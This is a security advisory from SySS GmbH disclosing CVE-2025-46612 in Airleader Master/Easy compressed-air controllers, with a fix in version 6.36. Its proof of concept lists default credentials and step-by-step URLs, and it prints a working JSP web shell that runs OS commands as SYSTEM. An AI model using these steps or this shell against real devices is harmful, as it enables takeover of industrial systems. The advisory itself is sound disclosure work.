-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-036 
Product:                   Airleader Master / Airleader Easy
Manufacturer:              Airleader WF Steuerungstechnik GmbH
Affected Version(s):       < 6.36
Tested Version(s):         6.33
Vulnerability Type:        Unrestricted Upload of File with Dangerous Type (CWE-434)
Risk Level:                Critical
Solution Status:           Fixed
Manufacturer Notification: 2025-04-22
Solution Date:             -
Public Disclosure:         2025-05-12
CVE Reference:             CVE-2025-46612
Author of Advisory:        Angel Lomeli, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Airleader Master and Airleader Easy (see [1]) are large hardware modules for 
controlling compressed air stations, mainly used in the manufacturing industry. 
The units are focused on efficiency and economization of resources, allowing 
for the measuring and control of compressed air quality. They include embedded 
web interfaces for data visualization and management.

The web interface is configured with weak credentials by default, as reported 
in a previous security advisory (see [2]). The application includes a "Panel 
Designer" dashboard (see [3]), which allows for unrestricted file upload. 
This can be abused to upload a web shell to the web server and achieve remote 
command execution in the underlying OS.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The software is vulnerable to the following:
1. Using weak default credentials for the web interface:
	<Product>		:	<User>		<Password>
	Airleader Master	: 	airleader	airleader
2. Unrestricted file upload, which can be abused to upload a shell
3. The web server runs with the highest privileges by default

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To reproduce this, follow the steps below:
1. Open the Airleader administrator console: https://<IP>/<PATH>/admin/login.jsp?show=login
2. Log in with the default credentials (airleader:airleader)
3. Navigate to "Fernbedienung" -> "Panel Designer" dashboard or directly visit 
   the URL https://<IP>/<path>/wizard/workspace.jsp?admin=true
4. Click on the "image upload" button and upload a JSP shell file, for example:
   <%@ page import="java.io.InputStream" %>
   <%@ page contentType="text/html;charset=UTF-8" language="java" %>
   <%
       if ("test".equals(request.getParameter("pwd"))) {
           InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd").split(" ")).getInputStream();
           int ret = -1;
           byte[] bs = new byte[2048];
           out.print("<pre>");
           while((ret = in.read(bs)) != -1) {
              out.println(new String(bs));
           }
           out.print("</pre>");
       }
   %>
5. It is now possible to run OS commands via the uploaded JSP shell, such as 
   by accessing the following URL: 
   https://<IP>/<path>/wizard/images/panel/<filename>.jsp?pwd=test&cmd=whoami
   > nt authority\system
6. Notice that the commands are run with the highest privileges

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has released a security update to mitigate this issue in version 6.36. 
SySS GmbH recommends updating the software to the latest version.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-04-03: Vulnerability discovered
2025-04-22: Vulnerability reported to manufacturer
2025-04-22: Vendor notified that this has been fixed in version 6.36
2025-05-12: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Airleader modules
    https://www.airleader.de/produkte
[2] SySS Security Advisory SYSS-2020-033
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-033.txt
[3] Panel Designer user guide
    https://www.airleader.de/user/upload/downloads/ib-und-montage/panel-designer.pdf
[4] SySS Security Advisory SYSS-2025-036
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-036.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by:

E-Mail: angel.lomeli@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Angel_Lomeli.asc
Key ID: 0x3511BA21C68F0D7A
Key Fingerprint: A081 85AB C051 78ED CE8A F8E2 3511 BA21 C68F 0D7A

E-Mail: fidelis.abt@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Fidelis_Abt.asc
Key ID: 0xD3BE05CA41B71781
Key Fingerprint: A5BA AD2D E1A3 EBEB F43B  A99C D3BE 05CA 41B7 1781

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en
-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQSggYWrwFF47c6K+OI1Ebohxo8NegUCaBx7EQAKCRA1Ebohxo8N
eiMnAQDMGOXEZU2+BCXmYduACYTXyjced69QBFcsWgxN8ED+kwEAmaZCqgigJTpK
WibPJ9tjcdWB0Dgh4jVapQEX/5YkSwo=
=QcF/
-----END PGP SIGNATURE-----